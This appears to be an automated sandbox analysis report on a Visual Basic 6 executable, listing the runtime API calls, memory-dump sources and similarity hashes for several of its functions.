__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsBstrGenerateList$#616CopyLockOverflow
String ID:
API String ID: 1495372892-0
Opcode ID: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
Instruction ID: a67bb8bcd321ef6f9d89d5af411f850dddceec761c9aca37c4a66d17d3038916
Opcode Fuzzy Hash: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
Instruction Fuzzy Hash: 19C127B0E002199FCB14DFA5DD84AEEBBB9FB48300F50816EE50AA7250DB746985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004171D7, Relevance: 57.3, APIs: 38, Instructions: 310COMMON

Download Yara Rule

APIs

#631.MSVBVM60(00000000,-00000001,?), ref: 00417209
__vbaFreeStr.MSVBVM60 ref: 0041722A
__vbaFreeVar.MSVBVM60 ref: 00417233
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsGenerateList$#616BstrCopyLockOverflow
String ID:
API String ID: 591398060-0
Opcode ID: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
Instruction ID: 5850bdb2f8cb840655fe358dbb68f1bf167492e12e76f8ba6df4694bbfc137e4
Opcode Fuzzy Hash: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
Instruction Fuzzy Hash: 88C117B0E002199FDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB746985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417143, Relevance: 55.8, APIs: 37, Instructions: 288COMMON

Download Yara Rule

APIs

__vbaInStr.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 00417157
__vbaLenBstr.MSVBVM60(00000000), ref: 00417180
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaSetSystemError.MSVBVM60 ref: 00417B9B

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ErrorFreeMove$BstrSystemUnlock$#616#631BoundsCopyGenerateListLockOverflow
String ID:
API String ID: 4020600759-0
Opcode ID: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
Instruction ID: 6f59f1f6fd00cf4eb64356afd8b00aa24b7c42f8971466ecdf1fdd0f8cb9e506
Opcode Fuzzy Hash: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
Instruction Fuzzy Hash: D8C108B1E00218DFDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417190, Relevance: 54.3, APIs: 36, Instructions: 286COMMON

Download Yara Rule

APIs

#709.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 004171A4
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaSetSystemError.MSVBVM60 ref: 00417B9B

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ErrorFreeMove$SystemUnlock$#616#631#709BoundsBstrCopyGenerateListLockOverflow
String ID:
API String ID: 2767930602-0
Opcode ID: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
Instruction ID: fd14dd4b6f58a52c042ba838fbe59068618bb76b1adec8898ddb627e80e0b945
Opcode Fuzzy Hash: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
Instruction Fuzzy Hash: 6DB118B1E00218DFDB24DFA5DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004179F2, Relevance: 25.7, APIs: 17, Instructions: 200COMMON

Download Yara Rule

APIs

__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
__vbaStrCat.MSVBVM60(?,004096D4,00000000,00000001), ref: 00417CE8
__vbaStrMove.MSVBVM60 ref: 00417CEF
__vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417CF7
__vbaStrMove.MSVBVM60 ref: 00417CFE
__vbaStrCat.MSVBVM60(?,00000000), ref: 00417D05
__vbaStrMove.MSVBVM60 ref: 00417D0C
__vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417D14
__vbaStrMove.MSVBVM60 ref: 00417D1B
__vbaInStr.MSVBVM60(00000001,00000000), ref: 00417D20
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00417D41
#618.MSVBVM60(00000000,00000003), ref: 00417D6E
__vbaStrMove.MSVBVM60 ref: 00417D79
__vbaStrCat.MSVBVM60(Function_00009254,004096CC,00000000), ref: 00417D86
__vbaStrMove.MSVBVM60 ref: 00417D8D
__vbaStrCmp.MSVBVM60(00000000), ref: 00417D90
__vbaSetSystemError.MSVBVM60(00000000,?,?,?,72A26A76,72A26C30,72A29596), ref: 00418B33
__vbaAryUnlock.MSVBVM60(?,00418BE2), ref: 00418BB3
__vbaAryUnlock.MSVBVM60(?), ref: 00418BBC
__vbaAryUnlock.MSVBVM60(?), ref: 00418BC5
__vbaFreeStr.MSVBVM60 ref: 00418BD0
__vbaFreeStr.MSVBVM60 ref: 00418BD5
__vbaFreeStr.MSVBVM60 ref: 00418BDA
__vbaFreeStr.MSVBVM60 ref: 00418BDF

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$ErrorFree$SystemUnlock$BoundsGenerateList$#618Lock
String ID:
API String ID: 2878159455-0
Opcode ID: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
Instruction ID: 2780b2efc1f4126fd3daf783c884f47e51bc0b84df1625baa5224246725a4293
Opcode Fuzzy Hash: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
Instruction Fuzzy Hash: 9A7117B0E042189FCB14DFA9DDC4AEEBBB5FB48300F6081AEE509A7250DB745A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004259A0, Relevance: 163.2, APIs: 92, Strings: 1, Instructions: 495COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 00425A0A
__vbaStrCopy.MSVBVM60 ref: 00425A12
__vbaOnError.MSVBVM60(00000001), ref: 00425A16
#648.MSVBVM60(0000000A), ref: 00425A2E
__vbaFreeVar.MSVBVM60 ref: 00425A3D
__vbaI2I4.MSVBVM60(?), ref: 00425A4F
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
__vbaI2I4.MSVBVM60 ref: 00425A61
#570.MSVBVM60(00000000), ref: 00425A64
__vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
__vbaStrCopy.MSVBVM60 ref: 00425A93

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 00425AA9
__vbaFreeStr.MSVBVM60 ref: 00425AAE
__vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
#525.MSVBVM60(00000000), ref: 00425AC9
__vbaStrMove.MSVBVM60 ref: 00425AD4
__vbaI2I4.MSVBVM60 ref: 00425AD9
__vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrMove.MSVBVM60(?), ref: 00425AF7
__vbaStrMove.MSVBVM60(00000003), ref: 00425B08
#616.MSVBVM60(00000000), ref: 00425B0B
__vbaStrMove.MSVBVM60 ref: 00425B16
__vbaStrCmp.MSVBVM60(?,00000000), ref: 00425B1D
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00425B3F
__vbaStrMove.MSVBVM60(?), ref: 00425B64
__vbaStrMove.MSVBVM60(00000004,?), ref: 00425B79
#618.MSVBVM60(00000000), ref: 00425B7C
__vbaStrMove.MSVBVM60 ref: 00425B87
__vbaStrCat.MSVBVM60(00000000), ref: 00425B8A
__vbaStrMove.MSVBVM60(00000000), ref: 00425BA5
__vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00425BB9
__vbaI2I4.MSVBVM60 ref: 00425BCE
__vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00425BD8
__vbaStrMove.MSVBVM60 ref: 00425B95

Part of subcall function 00411210: #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0041127A
Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2

__vbaStrCat.MSVBVM60(0000,?), ref: 00425C10
__vbaStrMove.MSVBVM60 ref: 00425C1B
__vbaStrCat.MSVBVM60(0000,?), ref: 00425C2C
__vbaStrMove.MSVBVM60 ref: 00425C37
__vbaStrMove.MSVBVM60(?), ref: 00425C47
__vbaFreeStr.MSVBVM60 ref: 00425C4C
__vbaI2I4.MSVBVM60 ref: 00425C55
__vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00425C5A
#648.MSVBVM60(0000000A), ref: 00425C72
__vbaFreeVar.MSVBVM60 ref: 00425C81
__vbaI2I4.MSVBVM60(?), ref: 00425C8D
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00425C97
#525.MSVBVM60(00001000), ref: 00425CA2
__vbaStrMove.MSVBVM60 ref: 00425CAD
__vbaI2I4.MSVBVM60 ref: 00425CE3
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425CEC
__vbaI2I4.MSVBVM60 ref: 00425CF4
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425CFD
#525.MSVBVM60(?), ref: 00425D29
__vbaStrMove.MSVBVM60 ref: 00425D34
__vbaI2I4.MSVBVM60 ref: 00425D39
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425D42
__vbaI2I4.MSVBVM60 ref: 00425D4A
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425D53
#594.MSVBVM60(0000000A), ref: 00425D77
__vbaFreeVar.MSVBVM60 ref: 00425D80
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00425D9C
#593.MSVBVM60(0000000A), ref: 00425DC6
__vbaGenerateBoundsError.MSVBVM60 ref: 00425DEF
__vbaGenerateBoundsError.MSVBVM60 ref: 00425DFD
__vbaFpUI1.MSVBVM60 ref: 00425E1F
__vbaFreeVar.MSVBVM60 ref: 00425E37
__vbaSetSystemError.MSVBVM60 ref: 00425E5F
__vbaI2I4.MSVBVM60 ref: 00425EAD
__vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425EB9

Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE

#593.MSVBVM60(0000000A), ref: 00425EF3
__vbaFpI4.MSVBVM60 ref: 00425F15
__vbaFreeVar.MSVBVM60 ref: 00425F20
__vbaSetSystemError.MSVBVM60 ref: 00425F34
__vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00425F4C
__vbaI2I4.MSVBVM60 ref: 00425F57
__vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425F63
__vbaI2I4.MSVBVM60 ref: 00425F82
__vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00425F91
__vbaI2I4.MSVBVM60 ref: 00425F95
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425F9E
__vbaI2I4.MSVBVM60 ref: 00425FA3
__vbaFileClose.MSVBVM60(00000000), ref: 00425FAC
__vbaI2I4.MSVBVM60 ref: 00425FB0
__vbaFileClose.MSVBVM60(00000000), ref: 00425FB3
__vbaExitProc.MSVBVM60 ref: 00425FBC
__vbaAryDestruct.MSVBVM60(00000000,?,0042604C), ref: 00426026
__vbaFreeStr.MSVBVM60 ref: 00426035
__vbaFreeStr.MSVBVM60 ref: 0042603A
__vbaFreeStr.MSVBVM60 ref: 0042603F
__vbaFreeStr.MSVBVM60 ref: 00426044
__vbaErrorOverflow.MSVBVM60 ref: 00426068

Strings

0000, xrefs: 00425C0B, 00425C27

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
String ID: 0000
API String ID: 292954213-211534962
Opcode ID: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
Instruction ID: ae26ad25c27fd2aa879063d40509198e82445ba020206e85d6646bf00855608d
Opcode Fuzzy Hash: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
Instruction Fuzzy Hash: AF125871E002189FDB14DFE4DD88AEEBBB5FB48301F10412AE506B72A0EB745985CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00422050, Relevance: 143.9, APIs: 81, Strings: 1, Instructions: 403COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0042206E
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042209B
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 004220AA
__vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220C0
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220CB

Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88

__vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,Function_000032B6), ref: 004220DD
__vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220F3
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220FE

Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 00425A0A
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3

__vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0042211F
__vbaStrCat.MSVBVM60(00408794,00000006,00000006,?,00000000,?,00000000,Function_000032B6), ref: 00422144
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042214F
#580.MSVBVM60(00000000,?,00000000,?,00000000,Function_000032B6), ref: 00422156
__vbaFreeStr.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042215F
#598.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042216C
__vbaNew2.MSVBVM60(004049C0,0042C060,0042C0F0,?,00000000,?,00000000,Function_000032B6), ref: 0042219D
__vbaObjSet.MSVBVM60(?,00000000), ref: 004221D7
__vbaObjSet.MSVBVM60(?,?), ref: 004221F8
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,0042C0F0,00000000,?,00000020), ref: 0042221E
#598.MSVBVM60(?,00000000,Function_000032B6), ref: 0042222E
